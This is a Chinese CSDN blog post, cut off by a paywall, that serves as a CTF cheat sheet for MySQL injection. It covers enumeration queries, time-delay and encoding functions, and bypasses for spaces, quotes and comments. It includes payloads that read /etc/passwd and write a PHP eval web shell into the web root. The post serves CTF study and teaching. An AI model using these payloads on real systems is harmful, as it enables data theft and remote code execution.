sql md5函数_CTF考点总结sql注入篇

最新推荐文章于 2022-07-07 17:41:08 发布
最新推荐文章于 2022-07-07 17:41:08 发布
阅读量777 收藏 1
点赞数
文章标签: sql md5函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39593523/article/details/111384539
版权

    来自Kagi师傅(终于见到了CTF的职业选手了60e7c99efb6bb1e923d3b105cf06d657.png60e7c99efb6bb1e923d3b105cf06d657.png60e7c99efb6bb1e923d3b105cf06d657.png)总结,我的CTF生涯还有很多个6年(未开始15f2d555d90c151abb2dc62e7ce66e04.png)

本文字数4000+,阅读时间约15分钟。

    整理下sql注入相关知识,查漏补缺(长期更新)

常用语句及知识

information_schema包含了大量有用的信息,例如下图

9995eecf94bf8673a355f6fe817a2e16.png

mysql.user下有所有的用户信息,其中authentication_string为用户密码的hash,如果可以使用可以修改这个值,那么就可以修改任意用户的密码

#sql当前用户:select user()数据库版本:select version() , select @@version数据库名:select database()操作系统:select @@version_compile_os所有变量:show variables单个变量:select @@secure_file_priv , show variables like 'secure_file_%'爆字段数:order by 1... ,group by 1...查库名:select group_concat(schema_name) from information_schema.schemata查表名:select group_concat(table_name) from information_schema.tables where table_schema='库名'查字段:select group_concat(column_name) from information_schema.columns where table_name='表名'读取某行:select * from mysql.user limit n,m // limit m offset n (第n行之后m行,第一行为0)读文件:select load_file('/etc/passwd')写文件:select '<?php @eval($_POST[a]);?>' into outfile '/var/www/html/a.php'  //该处文件名无法使用16进制绕过

常用函数

#sql截取字符串:substr('abc',1,1)、substring('abc',1,1)、left('abc',1)、right('abc',1),mid('abc',1,1)字符串拼接:concat('a','b','c'),concat_ws(' ','a','b','c')多行拼接:group_concat //eg: select group_concat(user) from mysql.user时延函数:sleep(5)、benchmark(10000000,md5('123456')) //其他方法get_lock(),笛卡尔,rlike等编码函数: hex、ord、ascii、char、conv(255,10,16)=FF(2-36进制转换)布尔条件:if(1,1,0)、position('a' in 'abc')、elt(1,'a','b')=a&&elt(2,'a','b')=b、(case when (bool) then 1 else 0 end)、field('a',3,2,'a')=3、nullif('a','b')=1&&nullif('a','a')=null、strcmp、regexp、rlike、regexp_like('1','1')...

所有函数及运算符:https://dev.mysql.com/doc/refman/8.0/en/func-op-summary-ref.html

绕过方法

绕过空格

#sql%20、%09、%0a、%0b、%0c、%0d、%a0、%00、/**/、 /*!select*/ 、()、--%0a(可以1-256都跑一遍)

其中%09需要php环境,%0a为\n  /!select/为mysql独有。常见用法为/!50727select 1/,即当版本号小于等于50727时,执行select 1

3ec1276d1702a5028ea180c13dea39ca.png

绕过单引号

sql\转义、宽字节%df%27,%bf%27、十六进制绕过

注释方法

sql/**/、--+、#、;%00、union /*!select*/(mysql独有)

select from union select绕过

sqlselect-1,user from mysql.userselect
最低0.47元/天 解锁文章
weixin_39593523
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入-md5加密参数漏洞(CTF例题)
bin789456的博客
08-29 1523
漏洞成因 php中的md5函数有一个可选参数,如果开发者写查询数据库函数时使用了这个参数,或者在数据存储时是md5后的字符串形式存储,都有可能产生这个漏洞。 利用方法 md5看似是非常强加密措施,但是一旦没有返回我们常见的16进制数,返回了二进制原始输出格式,在浏览器编码的作用下就会编码成为奇怪的字符串(对于二进制一般都会编码)。 我们使用md5碰撞,一旦在这些奇怪的字符串中碰撞出了可以进行SQL注入的特殊字符串,那么就可以越过登录了。 下面是参考资料的英文原版: The trick: Raw MD5 h
SQL注入
今天的风儿甚是喧嚣
07-07 280
常见SQL注入漏洞及其防御绕过方法
sql中使用md5
拾忆的博客
05-26 1万+
一、前言 这两天对之前的项目做出一些总结,发现是有过对数据库中字段使用md5操作的sql,于是记录发出来。 二、正文 有时候在数据库表的设计中,我们对一条数据的标识有时候不只是id,还有可能是很多个字段组合在一起作为唯一标志。 如对于一本书,book表有以下字段,name,year,author,version,price。其中name(书名),year(发表年份),author(作者),...
PHP中MD5加密的简单绕过及基于MD5加密的SQL注入
Landasika的博客
12-10 5252
部分内容参考于: sql注入md5($password,true)_March97的博客-CSDN博客_md5($pass,true) 目录 一、简介 二、基于PHP漏洞的绕过 1、MD5弱比较“==”绕过 2、MD5强比较“===”绕过 三、有关SQL注入MD5绕过 1、起因 2、注入原理 一、简介 md5() 函数计算字符串的 MD5 散列。 MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来..
PostgreSQL函数——字符函数
漓涂
07-30 2417
1、string || non-string ||string函数:字串或非字符串连接 select 'Post'||1||'greSQL'; 结果:Post1greSQL 2、ascii(string):参数第一个字符的ASCII码 select ascii('x'); 结果:120 3、chr(int)函数:得到某ACSII值对应的字符 SELECT chr(97); 结果:a 4、to_hex(number int/bigint):对数值进行十六进制编码 select to_hex(31
shell 提取sql 的字段名表名_渗透测试之SQL注入(二)
weixin_39583029的博客
11-16 316
文章原载于公众号:猪猪谈安全作者:随风kali前文一渗透测试之SQL注入(一)给大家讲了SQL注入的产生原理,SQL注入的种类和一些防御SQL注入的手段。接下来的章呢都是从实例去分析SQL注入。首先我们先分析一下DVWA靶场low等级的SQL注入。这里有一个user id需要我们填写,那我们先填写一个1看看会发生什么。这里查询到了user id为1号的信息,还记得我们前文说的验证SQL注入的方...
md5.zip_ctfmd5题_md5 ctf_md5 ctf_md5解密 ctf_解密
09-20
md5解密,ctf中经常用到的md5解密
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
SQL注入漏洞演示源代码
07-15
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
sql注入md5($password,true)
March97的博客
07-27 2万+
       前几天做了一道CTF的题目,是在”实验吧“的一道简单的web题目,当然这道题目很多人都解出来了,因为它的.php文件名就是答案。        他的网页链接里面的php文件名就是’ffifdyop.php‘。          上面的’ffifdyop‘就是我们要输入的密码。哦,忘了介绍,这道题目只需要表单提交密码。       当然如果直接输入ffifdyop,提交后就能出...
sql md5
luoganttcc的博客
09-19 2682
sql md5 最简单例子 select MD5('0j46o1112665989') as mdd 有时候需要将多个字符串拼接 select MD5(CONCAT('0j46o','1112665989')) 行 mdd5 1 gU89+XO93zUEg4w39N7U0A== 将MD5 的字节码转化为 16进制 SELECT TO_HEX(MD5(CONCAT('0j46o', CAST(1112665989 AS STRING)))) 行 s16 1 81
SQL注入-文件读写】文件的读取+写入:函数、使用方法
05-30 8774
SQL注入】文件读写
sql server 内置MD5加密函数
rookie_liu_ToFly的博客
11-10 9615
如何在sql server中实现自动加密,sql server 提供内置函数HashBytes。 首先,我们在数据库中执行 select HashBytes('MD5','12345678') 得到结果:0x25D55AD283AA400AF464C76D713C07AD 然后,我们使用MD5在线加密,得到结果如下: 我们可以看到数据库得到的结果比在线MD5加密32位大写的结果前
MySQL使用MD5函数对数据加密
热门推荐
崔昕阳的博客
04-08 5万+
一、MD5简介 MD5即Message-Digest Algorithm 5(信息-摘要算法5),用于确保信息传输完整一致。是计算机广泛使用的杂凑算法之一(又译摘要算法、哈希算法),主流编程语言普遍已有MD5实现。将数据(如汉字)运算为另一固定长度值,是杂凑算法的基础原理,MD5的前身有MD2、MD3和MD4。 二、实现数据加密 1.数据库建表 这里我使用了Navicat,在数据库test...
CTF-SQL注入总结
SWC0619的博客
03-11 8210
SQL注入总结(一)
PL/SQL版的MD5加密函数
冷月宫主的专栏
05-19 2998
PL/SQL版的MD5加密函数: CREATE OR REPLACE FUNCTION MD5(INPUT_STRING VARCHAR2) RETURN VARCHAR2 IS  RAW_INPUT     RAW(128) := UTL_RAW.CAST_TO_RAW(INPUT_STRING);  DECRYPTED_RAW RAW(2048);  ERROR_IN_INPUT_BU
SQL Server 2005散列函数
ejzhang的专栏
01-18 1322
<br />在SQL Server 2005下自带的函数HashBytes() ,此函数是微软在SQL Server 2005中提供的,可以用来计算一个字符串的MD5和SHA1值,使用方法如下:--获取123456的MD5加密串<br />select hashbytes('MD5', '123456') ;<br />--获取123456的SHA1加密串<br />select hashbytes('SHA1', '123456') ;<br />有了这个函数可以在SQL Server中为字符串进行加密,
ctfhub sql注入
最新发布
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的特权来执行数据库查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值